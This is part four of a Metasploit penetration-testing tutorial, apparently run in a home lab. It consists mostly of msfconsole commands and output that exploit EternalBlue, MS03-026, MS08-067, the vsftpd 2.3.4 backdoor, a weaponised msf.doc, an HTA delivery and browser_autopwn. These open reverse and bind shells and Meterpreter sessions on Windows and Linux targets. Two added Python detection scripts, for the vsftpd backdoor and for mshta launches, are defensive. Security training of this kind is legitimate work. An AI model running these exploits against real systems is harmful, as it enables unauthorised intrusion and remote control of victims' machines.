Software Penetration Testing with Metasploit (Part 4)

Starting the Penetration Test


Exploiting Host Vulnerabilities

Exploiting Operating System Vulnerabilities

Windows 7
msf6 > nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
[*] exec: nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 16:07 CST
Nmap scan report for 192.168.0.1
Nmap scan report for 192.168.0.158
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs:  CVE:CVE-2017-0143
| Risk factor: HIGH
msf6 > search ms17-010
Matching Modules
================
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49667 ) at 2022-06-23 16:32:15 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >


Windows 2000

msf6> use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.0.170
RHOST => 192.168.0.170
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[*] 192.168.0.170:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.170:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.170[135] ...
[*] 192.168.0.170:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.0.170:4444
[*] Command shell session 1 opened (192.168.0.150:34825 -> 192.168.0.170:4444) at 2022-07-21 15:40:55 +0800
Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
C:\WINNT\system32>


Using a Trojan

Windows 10, 7, 2003

msf> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit/multi/handler> set lhost 192.168.0.150
lhost => 192.168.0.150
msf exploit/multi/handler> set lport 8888
lport => 8888
msf exploit/multi/handler> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit/multi/handler> run
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:8888 -> 192.168.0.106:3552) at 2022-07-21 11:02:24 +0800
meterpreter >


Exploiting Client-Side Vulnerabilities

Exploiting vsftpd 2.3.4

Linux

msf6 exploit(windows/smb/ms08_067_netapi) > nmap -sT -A -P0 192.168.0.161
[*] exec: nmap -sT -A -P0 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 18:36 CST
Nmap scan report for 192.168.0.161
Host is up (0.00081s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.0.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_ssl-date: 2022-07-14T10:36:30+00:00; +6s from scanner time.
msf6 >search vsftpd
Matching Modules
================
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >exploit
[*] 192.168.0.161:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.161:21 - USER: 331 Please specify the password.
[+] 192.168.0.161:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.161:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:35303 -> 192.168.0.161:6200) at 2022-07-14 18:41:26 +0800
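The defender's view of this backdoor is the sequence the transcript shows: an FTP login attempt against a vsFTPd 2.3.4 service, then a new connection to port 6200 on the same host. The following script is an added detection example, not part of the original lab or of Metasploit; it correlates constructed FTP and connection log lines (a JSON-per-line format assumed for this example) and grades each port-6200 connection by that context.

```python
"""Correlate FTP and connection logs for signs of the vsftpd 2.3.4 backdoor.

Added detection example; not part of the original lab or of Metasploit.
Log format is constructed for this example: one JSON object per line with
ts, kind (ftp_banner | ftp_cmd | conn), src, dst, dport and, depending on
kind, banner or cmd/arg. Map your own FTP / Zeek / firewall fields onto it.
"""
import json
from datetime import datetime, timedelta

VULN_BANNER = "vsFTPd 2.3.4"    # banner the lab's nmap output showed
BACKDOOR_PORT = 6200            # the session above was opened to 192.168.0.161:6200
TRIGGER = ":)"                  # marker in the USER argument that activates the backdoor
WINDOW = timedelta(minutes=5)   # how long after an FTP login a 6200 connection is correlated

# Constructed sample: a client at .150 triggers the backdoor on .161;
# a second client at .20 logs in normally and reaches 6200 much later.
SAMPLE_LOG = """\
{"ts": "2022-07-14T18:41:20", "kind": "ftp_banner", "src": "192.168.0.150", "dst": "192.168.0.161", "dport": 21, "banner": "220 (vsFTPd 2.3.4)"}
{"ts": "2022-07-14T18:41:21", "kind": "ftp_cmd", "src": "192.168.0.150", "dst": "192.168.0.161", "dport": 21, "cmd": "USER", "arg": "Xb4f:)"}
{"ts": "2022-07-14T18:41:26", "kind": "conn", "src": "192.168.0.150", "dst": "192.168.0.161", "dport": 6200}
{"ts": "2022-07-14T18:50:00", "kind": "ftp_cmd", "src": "192.168.0.20", "dst": "192.168.0.161", "dport": 21, "cmd": "USER", "arg": "ftp"}
{"ts": "2022-07-14T19:30:00", "kind": "conn", "src": "192.168.0.20", "dst": "192.168.0.161", "dport": 6200}
{"ts": "2022-07-14T19:31:00", "kind": "conn", "src": "192.168.0.20", "dst": "192.168.0.161", "dport": 22}
"""


def detect(log_text):
    """Return a list of (timestamp, severity, message) alerts, in log order."""
    vulnerable = set()   # hosts whose banner advertised the affected version
    last_ftp = {}        # (src, dst) -> time of the most recent FTP command
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ts = datetime.fromisoformat(ev["ts"])
        pair = (ev["src"], ev["dst"])
        kind = ev["kind"]
        if kind == "ftp_banner":
            if VULN_BANNER in ev["banner"]:
                vulnerable.add(ev["dst"])
                alerts.append((ts, "info", f'{ev["dst"]} advertises {VULN_BANNER}'))
        elif kind == "ftp_cmd":
            last_ftp[pair] = ts
            if ev["cmd"].upper() == "USER" and TRIGGER in ev["arg"]:
                alerts.append((ts, "high", f'{ev["src"]} sent the backdoor trigger in USER to {ev["dst"]}'))
        elif kind == "conn" and ev["dport"] == BACKDOOR_PORT:
            # Any connection to 6200 is worth a look; grade it by context.
            prior = last_ftp.get(pair)
            if prior is not None and ts - prior <= WINDOW:
                sev, why = "critical", f"{(ts - prior).seconds}s after an FTP login from the same source"
            elif ev["dst"] in vulnerable:
                sev, why = "high", f"target runs {VULN_BANNER}, no recent FTP login correlated"
            else:
                sev, why = "medium", "no FTP context for this pair"
            alerts.append((ts, sev, f'{ev["src"]} -> {ev["dst"]}:{BACKDOOR_PORT} ({why})'))
    return alerts


if __name__ == "__main__":
    for ts, sev, msg in detect(SAMPLE_LOG):
        print(f"{ts.isoformat()}  {sev:8s}  {msg}")
```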


Brute-Force Guessing the Target's Open Ports

Windows 2000

msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.0.150:1
[*] 192.168.0.158:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] 192.168.0.158 - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 1 is not valid and will be closed
192.168.0.158 (Windows 2000) shut down automatically.


Using the msf.doc File

Windows 2000 SP0/SP4 English

msf6 exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/ms11_006_createsizeddibsection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > info
Name: MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
Module: exploit/windows/fileformat/ms11_006_createsizeddibsection
Platform: Windows
       Arch: 
Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2010-12-15
Provided by:
  Moti & Xu Hao
  Yaniv Miron aka Lament of ilhack
  jduck 
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows 2000 SP0/SP4 English
  2   Windows XP SP3 English
  3   Crash Target for Debugging
Check supported:
  No
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.doc          yes       The file name.
Payload information:
  Space: 512
  Avoid: 1 characters
Description:
  This module exploits a stack-based buffer overflow in the handling
  of thumbnails within .MIC files and various Office documents. When
  processing a thumbnail bitmap containing a negative 'biClrUsed'
  value, a stack-based buffer overflow occurs. This leads to arbitrary
  code execution. In order to trigger the vulnerable code, the folder
  containing the document must be viewed using the "Thumbnails" view.
References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-3970
  OSVDB (70263)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/MS11-006
  http://www.securityfocus.com/bid/45662
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[+] msf.doc created at /root/.msf4/local/msf.doc
#cp /root/.msf4/local/msf.doc /home/jerry/


Copy msf.doc to the Windows machine

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
Open msf.doc on Windows
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 2 opened (192.168.0.150:8888 -> 192.168.0.169:1487) at 2022-07-20 15:47:53 +0800


Attacking with an HTA File

Windows 10, 7

HTA file interpreter (screenshot)

C:\Windows\System32\mshta.exe


Running a file with the HTA interpreter


demo.hta

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>WEB安全测试实验</title>
<link rel="stylesheet" type="text/css" href="../css/style.css">
</head>
<body>
<h1>WEB 安全测试实验</h1>
</body>
</html>


Rendered output: WEB 安全测试实验

Run directly (screenshot)

Run in the browser (screenshot)

Starting the Attack

#msfconsole 
msf6 > use exploit/windows/fileformat/office_word_hta
msf6 exploit(windows/fileformat/office_word_hta) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/jerry/.msf4/local/msf.doc
[*] Using URL: http://0.0.0.0:8080/default.hta
[*] Local IP: http://192.168.0.150:8080/default.hta
[*] Server started.
[*] Sending stage (175174 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:8176 ) at 2022-06-16 16:27:50 +0800


Open the browser on the target, enter http://192.168.0.150:8080/default.hta, and either run it directly or save default.hta and run it; the attack succeeds.

msf6 exploit(windows/fileformat/office_word_hta) > sessions
Active sessions
===============
  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x86/windows  DESKTOP-9A8VFKB\xiang @ DESKTOP-9A8VFKB  192.168.0.150:4444 -> 192.168.0.106:8176  (192.168.0.106)
msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Users\xiang\Downloads
=================================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100666/rw-rw-rw-  7185  fil   2022-06-16 16:26:27 +0800  default.hta
100666/rw-rw-rw-  282   fil   2021-04-27 15:13:52 +0800  desktop.ini
meterpreter > pwd
C:\Users\xiang\Downloads
meterpreter > getuid
Server username: DESKTOP-9A8VFKB\xiang
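On the victim endpoint the same activity leaves a process-creation trail: mshta.exe started with a remote URL, or with an .hta file from the user's Downloads folder, and in the office_word_hta variant with WINWORD.EXE as its parent. The script below is an added detection example, not from the original lab; it scores constructed Sysmon-style process events against those patterns.

```python
"""Score process-creation events for the HTA delivery pattern shown above.

Added detection example; not part of the original lab. Events are
constructed for this example with Sysmon-like fields (host, ts,
parent_image, image, command_line); map your own EDR/Sysmon fields onto them.
"""
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSER_PARENTS = {"chrome.exe", "msedge.exe", "iexplore.exe", "firefox.exe"}
URL_RE = re.compile(r"https?://\S+", re.I)
# A local .hta path on the command line, quoted or not (non-greedy so a
# preceding quoted mshta.exe path is not swallowed).
HTA_PATH_RE = re.compile(r'([a-z]:\\[^"]+?\.hta)\b', re.I)
# Locations a standard user can write to; an .hta there was most likely downloaded or dropped.
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\(?:users|windows\\temp|programdata|temp)\\", re.I)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # the lab's direct run: default.hta saved to Downloads and launched from Explorer
    {"host": "DESKTOP-9A8VFKB", "ts": "2022-06-16T16:27:40", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" "C:\Users\xiang\Downloads\default.hta"'},
    # the office_word_hta path: Word pulls the HTA from the handler's server
    {"host": "DESKTOP-9A8VFKB", "ts": "2022-06-16T16:27:45",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" http://192.168.0.150:8080/default.hta'},
    # browser handed the URL straight to mshta
    {"host": "DESKTOP-9A8VFKB", "ts": "2022-06-16T16:28:01",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe http://192.168.0.150:8080/default.hta"},
    # an installed vendor HTA run from Explorer: low interest
    {"host": "DESKTOP-9A8VFKB", "ts": "2022-06-16T16:30:00", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
    # unrelated process, ignored
    {"host": "DESKTOP-9A8VFKB", "ts": "2022-06-16T16:30:05", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": r"notepad.exe"},
]


def score_event(ev):
    """Return an alert dict for an mshta.exe launch, or None for anything else."""
    if PureWindowsPath(ev["image"]).name.lower() != "mshta.exe":
        return None
    parent = PureWindowsPath(ev["parent_image"]).name.lower()
    cmd = ev["command_line"]
    score, reasons = 0, []
    if URL_RE.search(cmd):
        score += 3
        reasons.append("HTA fetched from a URL")
    if parent in OFFICE_PARENTS:
        score += 3
        reasons.append(f"spawned by Office process {parent}")
    elif parent in BROWSER_PARENTS:
        score += 1
        reasons.append(f"spawned by browser {parent}")
    m = HTA_PATH_RE.search(cmd)
    if m and USER_WRITABLE_RE.match(m.group(1)):
        score += 2
        reasons.append(f"HTA in user-writable path {m.group(1)}")
    severity = ("critical" if score >= 5 else "high" if score >= 3
                else "medium" if score >= 2 else "low")
    return {"host": ev["host"], "ts": ev["ts"], "parent": parent,
            "severity": severity, "score": score, "reasons": reasons}


def detect(events):
    """Alerts for every mshta.exe launch in the event list, in order."""
    return [a for a in (score_event(e) for e in events) if a is not None]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["ts"]} {a["severity"]:8s} parent={a["parent"]} {"; ".join(a["reasons"]) or "no indicators"}')
```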


Attacking via a Browser Plugin: Adobe Flash

It did not succeed; presumably Adobe Flash is no longer supported.

#msfconsole

msf6 > search adobe_flash

(screenshot of the search results)


msf6 > use 9
msf6 > use exploit/multi/browser/adobe_flash_hacking_team_uaf
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Using URL: http://0.0.0.0:8080/y0dKYgEIkI2zc
[*] Local IP: http://192.168.0.150:8080/y0dKYgEIkI2zc
[*] Server started.


With Adobe Flash Player 17 ActiveX installed on the target machine, entering http://192.168.0.150:8080/y0dKYgEIkI2zc in the browser triggers it.



Detecting Browser Vulnerabilities

Attacking with browser_autopwn

Windows 10, 7, 2003

msf6 auxiliary(server/browser_autopwn2) > use server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 27.
msf6 auxiliary(server/browser_autopwn) >
[*] Setup
[*] Starting exploit modules on host 192.168.0.150...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QOSlCDKP
[*] Local IP: http://192.168.0.150:8080/QOSlCDKP
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LNRlnrxdQ
[*] Local IP: http://192.168.0.150:8080/LNRlnrxdQ
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SytDwnNLVJ
[*] Local IP: http://192.168.0.150:8080/SytDwnNLVJ
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XxbRZnvPzF
[*] Local IP: http://192.168.0.150:8080/XxbRZnvPzF
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/dIavmEmlsJvA
[*] Local IP: http://192.168.0.150:8080/dIavmEmlsJvA
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/FSRTIbVUWRDsU
[*] Local IP: http://192.168.0.150:8080/FSRTIbVUWRDsU
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lIROBHwdaD
[*] Local IP: http://192.168.0.150:8080/lIROBHwdaD
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/pyJEvk
[*] Local IP: http://192.168.0.150:8080/pyJEvk
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/huhYFRmk
[*] Local IP: http://192.168.0.150:8080/huhYFRmk
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jAzqekl
[*] Local IP: http://192.168.0.150:8080/jAzqekl
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JCbqIs
[*] Local IP: http://192.168.0.150:8080/JCbqIs
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cBiTChJAeCWA
[*] Local IP: http://192.168.0.150:8080/cBiTChJAeCWA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kRyiwct
[*] Local IP: http://192.168.0.150:8080/kRyiwct
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YYQeJjzuqe
[*] Local IP: http://192.168.0.150:8080/YYQeJjzuqe
[*] Server started.
[*] Using URL: http://0.0.0.0:8080/PdyJht6uQ
[*] Local IP: http://192.168.0.150:8080/PdyJht6uQ
[*] Server started.


Enter http://192.168.0.150:8080/PdyJht6uQ in the browser under test:

[*] 192.168.0.106ie_createobject - Sending exploit HTML...
[*] 192.168.0.106mozilla_nstreerange - Redirecting to .html URL
[*] 192.168.0.106mozilla_nstreerange - Sending HTML
[*] 192.168.0.106mozilla_nstreerange - Sending XUL
[-] 192.168.0.106msxml_get_definition_code_exec - 192.168.0.106:10064 - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[-] 192.168.0.106adobe_flash_rtmp - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[*] 192.168.0.106ie_cgenericelement_uaf - Requesting: /YYQeJjzuqe
[-] 192.168.0.106ie_cgenericelement_uaf - Browser not supported, sending 404: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Interrupt: use the 'exit' command to quit
msf6 auxiliary(server/browser_autopwn) > sessions -i
Active sessions
===============
No active sessions.


Attacking with browser_autopwn2

Windows 2003

msf6 > use server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) > run
[*] Auxiliary module running as background job 0.
[*] Searching BES exploits, please wait...
msf6 auxiliary(server/browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 31.071206468
[*] Using URL: http://0.0.0.0:8080/IqV4IRZ7Q85f
[*] Local IP: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.
Exploits
========
 Order  Rank       Name                                  Payload
 -----  ----       ----                                  -------
 1      Excellent  firefox_webidl_injection              firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection    firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                    firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest             firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface        android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                 android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf     windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf         windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_arra  windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow       windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_delete_range_tl_op        osx/x86/shell_reverse_tcp on 4447
 12     Great      adobe_flash_uncompress_zlib_uaf       windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_job_overflow       windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_shader_drawing_fill       windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_pixel_bender_bof          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_opaque_background_uaf     windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_net_connection_confusion  windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_nellymoser_bof            windows/meterpreter/reverse_tcp on 4444
 19     Great      adobe_flash_hacking_team_uaf          windows/meterpreter/reverse_tcp on 4444
 20     Good       wellintech_kingscada_kxclientdownloa  windows/meterpreter/reverse_tcp on 4444
 21     Good       ms14_064_ole_code_execution           windows/meterpreter/reverse_tcp on 4444
[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] Server started.


Enter http://192.168.0.150:8080/IqV4IRZ7Q85f in the browser under test:

[*] Gathering target information for 192.168.0.169
[*] Sending HTML response to 192.168.0.169
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Requested: /PIJKiQZx/hqDDuX/
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending VBS stager
[*] Sending stage (175686 bytes) to 192.168.0.169
